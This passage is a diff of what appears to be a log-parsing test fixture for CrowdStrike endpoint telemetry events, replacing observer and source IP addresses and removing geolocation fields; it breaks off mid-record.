"{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.13\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:07.216Z", "kind": "state", "action": "SystemCapacity", @@ -6396,24 +5624,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-MD", - "city_name": "Hagerstown", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Maryland", - "location": { - "lon": -77.7337, - "lat": 39.6343 - } - }, - "address": "208.71.69.91", - "vendor": "crowdstrike", - "ip": "208.71.69.91", "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:48.429Z", "os": { @@ -6424,18 +5640,18 @@ }, "related": { "hosts": [ - "208.71.69.91" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.71.69.91" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465934800Z", - "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"208.71.69.91\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", + "ingested": "2021-12-09T13:36:11.151048300Z", + "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", "created": "2021-07-07T17:02:48.429Z", "kind": "state", "action": "FirmwareAnalysisStatus", @@ -6473,26 +5689,8 @@ "type": "macos" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OK", - "city_name": "Tulsa", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oklahoma", - "location": { - "lon": -95.9306, - "lat": 36.0284 - } - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.27.234.231", - "ip": "208.27.234.231" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -6501,21 +5699,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.160.204.13", - "vendor": "crowdstrike", - "ip": "208.160.204.13", "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:05:04.544Z", "ecs": { @@ -6523,20 +5712,20 @@ }, "related": { "hosts": [ - "208.160.204.13", - "208.27.234.231" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.160.204.13", - "208.27.234.231" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465941600Z", - "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"208.160.204.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"208.27.234.231\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151054800Z", + "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.544Z", "kind": "state", "action": "LocalIpAddressIP4", @@ -6606,21 +5795,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.209", - "vendor": "crowdstrike", - "ip": "208.216.134.209", "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0009806.1" + "version": "1007.8.0009806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:04:59.681Z", "ecs": { @@ -6628,7 +5808,7 @@ }, "related": { "hosts": [ - "208.216.134.209" + "67.43.156.13" ], "hash": [ "894356eb59e279696c304f07091b7fde", @@ -6636,12 +5816,12 @@ "4288861242" ], "ip": [ - "208.216.134.209" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465948300Z", - "original": "{\"CommandLine\":\"uname -a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"208.216.134.209\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", + "ingested": "2021-12-09T13:36:11.151061100Z", + "original": "{\"CommandLine\":\"uname -a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", "created": "2020-11-08T17:04:59.681Z", "kind": "event", "action": "ProcessRollup2", @@ -6696,21 +5876,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.3.106.158", - "vendor": "crowdstrike", - "ip": "208.3.106.158", "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:04:56.730Z", "ecs": { @@ -6718,19 +5889,19 @@ }, "related": { "hosts": [ - "208.3.106.158" + "67.43.156.14" ], "hash": [ "6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0", "1789338890" ], "ip": [ - "208.3.106.158" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465954900Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"208.3.106.158\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", + "ingested": "2021-12-09T13:36:11.151067300Z", + "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", "created": "2020-11-08T17:04:59.646Z", "kind": "event", "action": "EndOfProcess", @@ -6791,21 +5962,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "South America", - "country_name": "Colombia", - "location": { - "lon": -74.0758, - "lat": 4.5981 - }, - "country_iso_code": "CO" - }, - "address": "208.9.60.157", - "vendor": "crowdstrike", - "ip": "208.9.60.157", "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:04:57.926Z", "ecs": { @@ -6813,19 +5975,19 @@ }, "related": { "hosts": [ - "208.9.60.157" + "67.43.156.14" ], "hash": [ "faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f", "3343111420" ], "ip": [ - "208.9.60.157" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465961700Z", - "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"208.9.60.157\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", + "ingested": "2021-12-09T13:36:11.151073500Z", + "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", "created": "2020-11-08T17:04:59.935Z", "kind": "event", "action": "EndOfProcess", @@ -6925,21 +6087,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.14.207.30", - "vendor": "crowdstrike", - "ip": "208.14.207.30", "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009304.1" + "version": "1007.4.0009304.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:01.341Z", "ecs": { @@ -6947,19 +6100,19 @@ }, "related": { "hosts": [ - "208.14.207.30" + "67.43.156.14" ], "hash": [ "3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3", "3344040805" ], "ip": [ - "208.14.207.30" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465968400Z", - "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"208.14.207.30\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", + "ingested": "2021-12-09T13:36:11.151079900Z", + "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", "created": "2020-11-08T17:05:00.139Z", "kind": "event", "action": "EndOfProcess", @@ -7025,21 +6178,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.142.127", - "vendor": "crowdstrike", - "ip": "208.216.142.127", "serial_number": "ffffffff3a5a424fa02450da53619745", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:00.030Z", "ecs": { @@ -7047,7 +6191,7 @@ }, "related": { "hosts": [ - "208.216.142.127" + "67.43.156.13" ], "hash": [ "571391f723a439e985a2064337e2802a", @@ -7055,12 +6199,12 @@ "3765958535" ], "ip": [ - "208.216.142.127" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465975100Z", - "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe --ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"208.216.142.127\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", + "ingested": "2021-12-09T13:36:11.151086200Z", + "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe 